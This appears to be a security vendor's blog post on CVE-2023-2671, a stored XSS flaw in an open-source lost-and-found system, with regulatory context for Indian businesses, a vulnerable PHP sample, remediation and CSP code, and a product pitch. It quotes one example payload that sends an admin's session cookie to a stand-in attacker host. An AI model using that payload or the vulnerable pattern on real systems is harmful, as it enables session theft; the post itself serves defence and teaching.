XSS Vulnerability in Lost & Found Systems: How Indian SMBs Are at Risk
What Happened
A cross-site scripting (XSS) vulnerability was discovered in SourceCodester's Lost and Found Information System version 1.0—a popular open-source platform used by Indian colleges, hospitals, hotels, and logistics companies to manage lost item reports and recovery inquiries.
The vulnerability (CVE-2023-2671) exists in the contact form handler located at classes/Master.php?f=save_inquiry. The flaw allows attackers to inject malicious JavaScript code through seemingly innocent form fields like fullname, contact, and message. When a staff member or administrator views these inquiries, the malicious script executes in their browser, potentially stealing session tokens, admin credentials, or triggering further attacks.
What makes this particularly dangerous: the vulnerability is remotely exploitable—an attacker needs no special access, just internet connectivity. The exploit code has already been publicly disclosed, meaning threat actors are actively scanning for vulnerable installations. In India's fragmented SMB ecosystem, where many organizations run outdated open-source software without regular security updates, this is an active threat.
Why This Matters for Indian Businesses
If you're running a college, hospital, hotel, or any organization using open-source systems like SourceCodester's Lost and Found, you face both operational and regulatory risk.
Regulatory Exposure
Under the Digital Personal Data Protection (DPDP) Act, 2023, organizations must implement reasonable security measures to protect personal data. An XSS vulnerability that exposes student names, phone numbers, email addresses, or medical information violates this obligation. The DPDP Act mandates data protection by design, incident notification within 72 hours if personal data is breached, and significant financial penalties for non-compliance.
Under CERT-In Directions 2022, organizations have 6 hours to notify CERT-In of any cybersecurity incident affecting critical infrastructure or sensitive data. Educational institutions and healthcare facilities fall under this scope.
Real-World Impact for Indian SMBs
Here's how a stored XSS attack typically cascades in practice:
- Attacker injects malicious script into a lost item inquiry form
- Admin logs in to review inquiries — the script steals their session cookie
- Attacker uses the stolen admin session to access sensitive databases or create backdoor accounts
- Weeks later, the organization discovers unauthorized access to student records, patient data, or financial information
- The organization must notify affected individuals, file CERT-In reports, and face potential DPDP penalties
Who Is Vulnerable?
- Educational institutions using open-source lost-and-found or inquiry systems
- Hospitals and clinics tracking lost medical equipment or patient belongings
- Hotels and resorts managing guest lost-item inquiries
- Logistics and courier companies using similar open-source platforms
- Government offices and municipal corporations with public inquiry systems
Technical Breakdown
The Attack Flow
```mermaid
graph TD
A[Attacker crafts malicious inquiry] -->|XSS payload in fullname/message| B[Form submitted to Master.php]
B -->|payload stored in database unsanitized| C[Admin views inquiry dashboard]
C -->|JavaScript executes in admin browser| D[Session cookie stolen]
D -->|attacker impersonates admin| E[Unauthorized data access]
E -->|student/patient records exfiltrated| F[DPDP violation + CERT-In incident]
style A fill:#5f1e1e,stroke:#EF4444,color:#e2e8f0
style C fill:#5f1e1e,stroke:#EF4444,color:#e2e8f0
style D fill:#5f1e1e,stroke:#EF4444,color:#e2e8f0
style E fill:#5f1e1e,stroke:#EF4444,color:#e2e8f0
style F fill:#5f1e1e,stroke:#EF4444,color:#e2e8f0
style B fill:#1e3a5f,stroke:#3B82F6,color:#e2e8f0
```

The Vulnerable Code Pattern
```php
<?php
// VULNERABLE CODE - DO NOT USE
if ($_GET['f'] == 'save_inquiry') {
    $fullname = $_POST['fullname']; // No sanitization
    $contact  = $_POST['contact'];  // No validation
    $message  = $_POST['message'];  // Direct input
    // Stored directly in database; the string concatenation is an SQL injection flaw as well
    $query = "INSERT INTO inquiries (fullname, contact, message) VALUES ('$fullname', '$contact', '$message')";
    mysqli_query($conn, $query);
}

// Later, in the admin dashboard, the stored row is printed without encoding:
echo "<h3>" . $row['fullname'] . "</h3>"; // XSS HERE!
echo "<p>" . $row['message'] . "</p>";    // And here!
?>
```

Example Malicious Payload
An attacker submits a form like this:
```html
<input name="fullname" value="Lost Phone<script>fetch('https://attacker.com/steal?cookie='+document.cookie)</script>">
```

When an admin views this inquiry, the JavaScript executes, sending their session cookie to the attacker's server. From there, the attacker can forge admin requests, access the entire database, modify or delete records, and create persistent backdoor accounts.
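To make concrete what the admin page should emit for exactly this inquiry, here is an added example (not code from the article or from the SourceCodester project) that runs the payload above through allow-list validation, context-aware output encoding, and a triage scan of rows that were stored before any fix was applied. The functions `validate_inquiry`, `render_inquiry` and `find_suspicious_inquiries`, and the sample rows, are constructed for this illustration.

```php
<?php
// Added example (not code from the article or the SourceCodester project).
// Shows the article's payload going through validation, through output
// encoding, and through a scan of rows that were stored before a fix.
declare(strict_types=1);

// Constructed inquiry, using the payload quoted in the article.
$incoming = [
    'fullname' => "Lost Phone<script>fetch('https://attacker.com/steal?cookie='+document.cookie)</script>",
    'contact'  => '9876543210',
    'message'  => 'Black phone lost near the library on Monday.',
];

// Allow-list validation per field. Returns a list of errors instead of
// calling die(), so the caller decides how to respond.
function validate_inquiry(array $post): array
{
    $errors = [];
    $fullname = trim((string)($post['fullname'] ?? ''));
    $contact  = trim((string)($post['contact'] ?? ''));
    $message  = trim((string)($post['message'] ?? ''));

    // Letters, spaces, dots and apostrophes, bounded length. \p{L} with /u
    // accepts names written in Indian scripts, not only ASCII letters.
    if (!preg_match("/^[\p{L} .']{2,100}$/u", $fullname)) {
        $errors['fullname'] = 'Name may contain letters, spaces, dots and apostrophes only.';
    }
    if (!preg_match('/^[0-9]{10}$/', $contact)) {
        $errors['contact'] = 'Contact must be a 10-digit number.';
    }
    if ($message === '' || mb_strlen($message) > 1000) {
        $errors['message'] = 'Message must be 1 to 1000 characters.';
    }
    return $errors;
}

// Output encoding per context. HTML body and attribute values go through
// htmlspecialchars; data handed to page scripts is JSON-encoded with flags
// that also escape < > & ' " so it cannot close the <script> element.
function html(string $s): string
{
    return htmlspecialchars($s, ENT_QUOTES | ENT_SUBSTITUTE | ENT_HTML5, 'UTF-8');
}

function render_inquiry(array $row): string
{
    $json = json_encode(
        ['fullname' => $row['fullname'], 'contact' => $row['contact']],
        JSON_HEX_TAG | JSON_HEX_AMP | JSON_HEX_APOS | JSON_HEX_QUOT
    );
    return '<h3>' . html($row['fullname']) . '</h3>' . "\n"
         . '<p>' . html($row['message']) . '</p>' . "\n"
         . '<a href="tel:' . html($row['contact']) . '">Call</a>' . "\n"
         . '<script>const inquiry = ' . $json . ';</script>';
}

// Rows stored before the fix may already hold payloads. This flags rows
// whose fields contain markup or script-like fragments so they can be
// reviewed during incident response; it is a triage aid, not proof.
function find_suspicious_inquiries(array $rows): array
{
    $pattern = '/<\s*\/?\s*[a-z]|javascript:|on[a-z]+\s*=/i';
    $hits = [];
    foreach ($rows as $row) {
        foreach (['fullname', 'contact', 'message'] as $field) {
            if (preg_match($pattern, (string)$row[$field])) {
                $hits[] = ['id' => $row['id'], 'field' => $field];
            }
        }
    }
    return $hits;
}

// 1. New submissions: the payload does not pass validation.
$errors = validate_inquiry($incoming);
echo "Validation errors: " . json_encode($errors) . "\n";

// 2. Display: even if such a row exists, the encoded output contains no
//    executable tag; the '<' of the payload becomes '&lt;' in the heading.
$stored = $incoming + ['id' => 42];   // constructed legacy row
echo render_inquiry($stored) . "\n";

// 3. Triage of existing rows (constructed sample).
$legacy = [
    $stored,
    ['id' => 43, 'fullname' => 'Asha Rao', 'contact' => '9123456780', 'message' => 'Lost a blue umbrella.'],
];
echo "Suspicious rows: " . json_encode(find_suspicious_inquiries($legacy)) . "\n";
```

Validation only stops new submissions; output encoding is what protects rows that are already in the database, which is why both belong in the fix. The JSON branch is included because a dashboard that hands inquiry data to page scripts needs a different encoder than the HTML body, and `htmlspecialchars` alone is not enough there.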
How to Protect Your Business
Immediate Actions
Check if you're running the vulnerable system:
```bash
# Look for Master.php in web directories
find /var/www -name "Master.php" -type f 2>/dev/null
# Check for the vulnerable endpoint pattern
grep -r "save_inquiry" /var/www/ 2>/dev/null
```

Temporarily restrict access while patching:
```nginx
# Block access via nginx
location /classes/ {
    deny all;
}
```

Note that this also blocks legitimate requests to the handler in classes/, so the public inquiry form stops working; treat it as a stopgap until the code is fixed. Update to the latest version from the vendor.
Long-Term Fix: Input Validation and Output Encoding
```php
<?php
// SECURE CODE
if ($_GET['f'] == 'save_inquiry') {
    $fullname = trim($_POST['fullname'] ?? '');
    $contact  = trim($_POST['contact'] ?? '');
    $message  = trim($_POST['message'] ?? '');
    // Validate fullname (letters and spaces only)
    if (!preg_match('/^[a-zA-Z\s]{2,100}$/', $fullname)) {
        die('Invalid fullname');
    }
    // Validate contact number
    if (!preg_match('/^[0-9]{10}$/', $contact)) {
        die('Invalid contact number');
    }
    // Use prepared statements to prevent SQL injection too
    $stmt = $conn->prepare("INSERT INTO inquiries (fullname, contact, message) VALUES (?, ?, ?)");
    $stmt->bind_param('sss', $fullname, $contact, $message);
    $stmt->execute();
    $stmt->close();
}

// Always encode output when displaying user-supplied data
echo "<h3>" . htmlspecialchars($row['fullname'], ENT_QUOTES, 'UTF-8') . "</h3>";
echo "<p>" . htmlspecialchars($row['message'], ENT_QUOTES, 'UTF-8') . "</p>";
?>
```

Enable Content Security Policy
```nginx
# Nginx — prevents inline script execution even if XSS payload is injected
add_header Content-Security-Policy "default-src 'self'; script-src 'self'; style-src 'self' 'unsafe-inline'; img-src 'self' data: https:;" always;
# Additional security headers
add_header X-Frame-Options "SAMEORIGIN" always;
add_header X-Content-Type-Options "nosniff" always;
```

XSS Prevention Checklist for Indian SMBs
| Control | Description | Priority |
|---|---|---|
| Output encoding | htmlspecialchars() on all user-supplied data | Critical |
| Input validation | Whitelist expected characters per field | Critical |
| Content Security Policy | Block inline script execution | High |
| Parameterized queries | Prevent SQL injection alongside XSS | High |
| WAF deployment | ModSecurity OWASP CRS blocks common XSS | High |
| Session security | HttpOnly + Secure cookie flags | High |
| CERT-In readiness | Document 6-hour reporting procedure | Medium |
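Two rows of the checklist, Content Security Policy and session security, in code, as an added example that is not from the article or from the SourceCodester project: `audit_csp` parses a policy header value and reports whether it actually blocks inline scripts (a policy that lists `'unsafe-inline'` in `script-src` with no nonce or hash gives no XSS protection), and `start_admin_session` applies HttpOnly, Secure and SameSite to the admin session cookie. The function names and the weakened policy string are constructed for this illustration; the strict policy is the one from the nginx snippet above.

```php
<?php
// Added example (not code from the article or the SourceCodester project):
// (1) audit a Content-Security-Policy value for the things that would let
//     an injected <script> run anyway, (2) set admin session cookie flags.
declare(strict_types=1);

// Parse "directive source source; directive ..." into name => [sources].
function parse_csp(string $header): array
{
    $policy = [];
    foreach (explode(';', $header) as $directive) {
        $tokens = preg_split('/\s+/', trim($directive), -1, PREG_SPLIT_NO_EMPTY);
        if ($tokens === false || $tokens === []) {
            continue;
        }
        $name = strtolower(array_shift($tokens));
        $policy[$name] = $tokens;
    }
    return $policy;
}

// Returns a list of findings; an empty list means scripts are limited to the
// listed origins and inline scripts are blocked.
function audit_csp(string $header): array
{
    $policy = parse_csp($header);
    $findings = [];

    // script-src falls back to default-src when it is absent.
    if (isset($policy['script-src'])) {
        $scriptSrc = $policy['script-src'];
    } elseif (isset($policy['default-src'])) {
        $scriptSrc = $policy['default-src'];
    } else {
        return ['No script-src or default-src: inline and remote scripts are unrestricted.'];
    }

    $lower    = array_map('strtolower', $scriptSrc);
    $hasNonce = (bool) preg_grep("/^'nonce-/", $lower);
    $hasHash  = (bool) preg_grep("/^'sha(256|384|512)-/", $lower);

    // Browsers ignore 'unsafe-inline' when a nonce or hash is present, so it
    // is only a finding when it is the sole inline mechanism.
    if (in_array("'unsafe-inline'", $lower, true) && !$hasNonce && !$hasHash) {
        $findings[] = "script-src allows 'unsafe-inline': an injected <script> still runs.";
    }
    if (in_array("'unsafe-eval'", $lower, true)) {
        $findings[] = "script-src allows 'unsafe-eval'.";
    }
    if (in_array('*', $lower, true) || in_array('https:', $lower, true)) {
        $findings[] = 'script-src allows scripts from any origin; an attacker-hosted script would load.';
    }
    return $findings;
}

// Cookie flags for the admin session: HttpOnly keeps document.cookie from
// exposing the session id (the theft path in the article), Secure limits it
// to HTTPS, SameSite=Strict keeps it off cross-site requests.
function admin_session_cookie_params(): array
{
    return [
        'lifetime' => 0,
        'path'     => '/',
        'domain'   => '',
        'secure'   => true,
        'httponly' => true,
        'samesite' => 'Strict',
    ];
}

// Call this instead of a bare session_start() on admin pages.
function start_admin_session(): void
{
    session_set_cookie_params(admin_session_cookie_params());
    ini_set('session.use_strict_mode', '1'); // reject session ids the server did not issue
    session_start();
}

// The header from the article's nginx snippet, and a constructed weakened
// variant of the kind the audit is meant to catch.
$strict = "default-src 'self'; script-src 'self'; style-src 'self' 'unsafe-inline'; img-src 'self' data: https:;";
$weak   = "default-src 'self'; script-src 'self' 'unsafe-inline' https:; img-src *;";

echo "strict: " . json_encode(audit_csp($strict)) . "\n";
echo "weak:   " . json_encode(audit_csp($weak)) . "\n";
```

The audit can be pointed at the `Content-Security-Policy` value returned by a deployed server (for example, copied from `curl -sI` output) to confirm that the header reached the browser in the intended form; a reverse proxy or CDN that rewrites headers is a common reason the nginx configuration and the delivered policy differ.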
How Bachao.AI Helps Detect XSS
Bachao.AI by Dhisattva AI Pvt Ltd automates XSS detection as part of VAPT scanning. For a system like the one affected by CVE-2023-2671, the scan would:
- Crawl all forms and identify injectable parameters
- Submit XSS payloads into fullname, contact, and message fields
- Check whether payloads execute when viewed in an admin context (stored XSS detection)
- Flag the vulnerability with CVSS severity, remediation steps, and OWASP category mapping
- Generate a DPDP-aligned report documenting the personal data exposure risk
Action Plan
This week:
- [ ] Check if your system uses SourceCodester Lost and Found v1.0
- [ ] Search for `Master.php` with `save_inquiry` endpoints
- [ ] Apply output encoding (`htmlspecialchars`) to all displayed user data
- [ ] Replace all SQL string concatenation with prepared statements
- [ ] Add Content Security Policy headers
- [ ] Schedule a VAPT scan to identify all injection flaws across your applications
- [ ] Subscribe to CERT-In advisories
- [ ] Monitor OWASP Top 10 updates for emerging vulnerability classes
- [ ] Train developers on secure coding (input validation and output encoding fundamentals)
Frequently Asked Questions
What is cross-site scripting (XSS)?
Cross-site scripting (XSS) is a vulnerability where an attacker injects malicious JavaScript into a web application. When another user (often an admin) views the injected content, the script executes in their browser — potentially stealing credentials, session tokens, or triggering further attacks.
What is CVE-2023-2671?
CVE-2023-2671 is a stored XSS vulnerability in SourceCodester Lost and Found Information System v1.0. The fullname, contact, and message fields in classes/Master.php?f=save_inquiry are stored without sanitization and rendered without encoding, allowing attackers to execute JavaScript in admin browsers.
What is the difference between stored and reflected XSS?
Stored XSS (like CVE-2023-2671) persists in the database and executes for every user who views the affected page. Reflected XSS is triggered only when a victim clicks a crafted link. Stored XSS is generally more severe because it requires no victim interaction beyond normal site usage.
Does this affect Indian businesses specifically?
Yes. Open-source systems from SourceCodester and similar repositories are widely deployed across Indian educational institutions, hospitals, and SMBs. Under India's DPDP Act 2023, storing personal data in a system with known XSS vulnerabilities constitutes a failure of "reasonable security measures."
What should I do if I suspect my admin account has been compromised via XSS?
Immediately invalidate all active sessions, rotate admin credentials, review database access logs, and notify CERT-In within 6 hours per CERT-In Directions 2022.
Protect your business with Bachao.AI — India's automated vulnerability assessment and penetration testing platform by Dhisattva AI Pvt Ltd, DPIIT Recognized Startup. Get a comprehensive security scan of your web applications and infrastructure. Visit Bachao.AI to get started.